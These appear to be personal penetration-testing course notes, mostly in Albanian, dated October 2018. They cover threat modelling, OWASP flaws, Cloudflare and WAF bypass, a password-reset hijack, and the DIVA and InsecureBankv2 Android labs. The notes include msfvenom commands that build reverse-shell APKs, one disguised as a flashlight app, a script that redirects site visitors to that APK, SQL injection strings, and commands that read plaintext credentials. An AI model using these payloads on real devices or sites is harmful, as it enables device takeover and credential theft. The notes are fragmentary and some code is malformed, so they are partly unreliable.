temper data, burb suite
md5sum filename
captach bohet bypass tu mos e shkru captaca
captacha e rujtje ne cookies
e validon nje captcha manedj e perdor cdo her te njejten captch ne qat session
captacha gjendet se eshte tu u perserit
== threats te nje kompanie pharmaceutic ==
-goverment/rules
-criminal organizations
-competition
-chinese apt
-treg jo lojal
-black mails
-insiders threats
mobile front: xml
mobile api: android, iOS, balackbarry,
logging: elk stack,splunk, qradar, gfi, solarwinds
databases: MS sql, my sql, oracle, db2 etj
backend: php, asp, python etj
midleware
front end
== threat actors te rasi i nje news media==
politika
konkurrenca
black hats
availability
reputation
market sharing
REMEDIATION
Insecure Direct Object Reference (IDOR)
172.16.60.85
172.16.60.88
Download Nessus from here. Choose the Ubuntu packages (or the Debian ones)
Open a Terminal and go to the download directory (cd)
Run sudo dpkg -i Nessus*.deb. Enter root password.
Start it sudo /etc/init.d/nessusd start
Open a browser and go to https://localhost:8834/
17.10.2018
Broken Authentication
Password recovery function
modify email ku shkon opt me email ku kemi qasje
email hap
kerkon me hap mail te re
e krijon nje mail
e zevendeson me email e krijuar
e intercept e shtin email e re
funksioni e gjet mail qel
e qon confirmimin mi kallxu ku me qu konfirmimin
kete konfirmim e modifikon me mail te re edhe konfirmimi shkon ne mail te re
cdo mail ne facebook database eshte nje uique ID e re
kjo punon vetem me mails te reja
sql injection
sensitive data export
bypass cludeflare
tu provu mi gjet subdomain
tu gjet misconfiguration
tu e kqyr historin e domains (qysh e ka pas para se me hi ne cludeflare) rekomandohet me ndrru IP para se me hi CF
bruteforce sub-domains,rekomandohet me hi krejt subdomains
full path ne url, tregon qa mun me hack ne qat server
XML and XXE attack
bypass WAF
check for encoders
check for sql inj "
for symbols '
Security Misconfiguration
NAT all port nat to one port
SSH open
admin page open to external
device console unprotected
22.10.2018
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.65.141 LPORT=9999 R> king2.apk
e index.html inserto
<script>
window.location.assign("update.apk");
test with android by uploading a malware in android and meterpreter to manage the session
kur ta viziton faqen dikush me te dal redirected update.apk
mitmf ???
26.10.2018
msfvenom -x flashlight.apk -p android/meterpreter/reverse_tcp LHOST=172.16.60.69 LPORT=9559 R> flash-light.apk
29.10.2018
import request
payload = {"username":"jack","password":"P@ssw0rd","from_acc":"5555555","to_acc":"999999",""amount,"10"}
r = request.post("http://127.0.0.1:8888/dotransfer", data=payload)
print r.text
python sendMN.py
### test if we can view account state
/getaccounts
nano getA.py
import request
payload = {"username":"dinesh","password":"P@ssw0rd"}
r = request.post("http://127.0.0.1:8888/getaccounts", data=payload)
print r.text
me burb e validojm changepassword requestin
intersept requestin kur e ke ndrru passwordin
nano changPassowrd.py
import request
payload = {"username":"jack", "newpassword":"Password"}
r= request.post("https://127.0.0.1:8888/changepassword", data=payload)
print r.text
adb shell
adb pull
adb push
pm list package
am start -n
am start -n com.android.insecurebankv2/.Postlogin
am start -n jakhar.aseem.diva
apktool -d emri
31.10.2018
me zgjedh nej ..
me exploit
me dokumentu
## insecure logging
##checkout tu e shkru cc number edhe shiko a pe sheh cc number me command me posht
# adb logcat | grep credit
## nese e sheh plain text cc number kjo i bjen qe eshte vul.
apltool d diva.apk -o diva-extarcted
ne extracted folder #cat HardcodeActivity.smali
3.
adb shell # be sure OS is rooted
3.insecure data storage - part1
create user/pass
su - to get root access
cd /data/data/jahkar/aseem.diva/shared_prefs
ls
cat *.xml
:) you will see user and pass plain text
4.
adb shell
create user/pass
cd /data/data/jahkar/aseem.diva/
ls then cd databases
ids2 chosen
adb pool /data/data/jahkar/aseem.diva/databases/ids2
file ids2 ##s1llite3 is found
sqlite3 ids2
.tables
select * from myuser;
5.
adb shell
create user/pass
cd /data/data/jahkar/aseem.diva/
when user is created a file named uinfo23423j2tmp
cat uinfo23423j2tmp
:) you will see user/pass created on app
6.
adb shell
grant storage access for diva app
create user/pass
cd /mnt/sdcard
cat .uinfo.txt
:) you will see user/pass created on app
7.
search 1'or'1'='1
this will query for all users in database
8.
view an url ex: https://www.google.com
than you will be able to view or move through directories
ex file:// or file://etc/filename
file:///etc/hosts